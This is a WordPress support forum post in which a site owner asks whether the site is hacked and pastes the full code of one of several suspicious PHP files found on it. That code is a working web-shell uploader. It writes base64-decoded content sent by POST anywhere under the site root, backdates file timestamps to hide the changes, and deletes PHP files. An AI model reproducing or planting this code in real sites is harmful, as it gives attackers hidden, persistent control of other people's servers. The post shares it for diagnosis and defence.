Is my WordPress being hacked?
-
I have noticed recently that some new files are showing up in my editor area of my wordpress website.
The files have long names like:
b33959ad73c3009059ccd99f10e6e9b2.php
One is full of junk and some stuff about basedecode.
Another says only: access denied
And ones has the following:
<?php $cur_dir = getcwd () . '/'; if ( isset ( $_POST['test'] ) ) { echo "Test " . "OK"; die (); } if ( isset ( $_POST['upload'] ) ) { $file_name = $_POST['fname']; $content = base64_decode ( $_POST['fcontent'] ); $home = substr ( $cur_dir, 0, stripos ( $cur_dir, '/wp-content/' ) + 1 ); $bd = $home . $file_name; echo $dir = substr ( $bd, 0, strripos ( $bd, '/' ) + 1 ); $flist = glob ("$dir*.php"); $date = filemtime ( array_pop ($flist) ); $f = fopen ( $bd, 'w' ); fputs ( $f, $content ); fclose ($f); touch ( $bd, $date ); die (); } if ( isset ( $_POST['clean'] ) ) { if ( 'cache' === strtolower ( substr ( $cur_dir, strrpos ( $cur_dir, '/', -2 ) + 1, -1 ) ) ) { $tim_file = substr ( $cur_dir, 0, strrpos ( $cur_dir, '/', -2 ) + 1 ) . $_POST['tim']; $date = filemtime ( $tim_file ); $old_tim = ''; $f = fopen ($tim_file, 'r'); while ( ($line = fgets($f)) !== false) $old_tim .= $line; fclose($f); $tim = str_ireplace ( array ( 'ereg($site, $url_info[\'host\']) == true', 'preg_match($site, $url_info[\'host\']) == true' ) , 'preg_match (\'/(?:^|\.)\' . $site . \'$/i\', $url_info[\'host\'])', $old_tim); if ($old_tim !== $tim) { $f = fopen ( $tim_file, 'w' ); fputs ( $f, $tim ); fclose ($f); @touch ( $tim_file, $date ); if ( $date !== filemtime ( $tim_file )) { unlink ( $tim_file ); $f = fopen ( $tim_file, 'w' ); fputs ( $f, $tim ); fclose ($f); @touch ( $tim_file, $date ); } echo "TimThumb updated\n"; } $cdir = glob ( $cur_dir . "*.php" ); array_map ( 'unlink', $cdir ); } die(); } ?>
Viewing 7 replies - 1 through 7 (of 7 total)
Viewing 7 replies - 1 through 7 (of 7 total)
- The topic ‘Is my WordPress being hacked?’ is closed to new replies.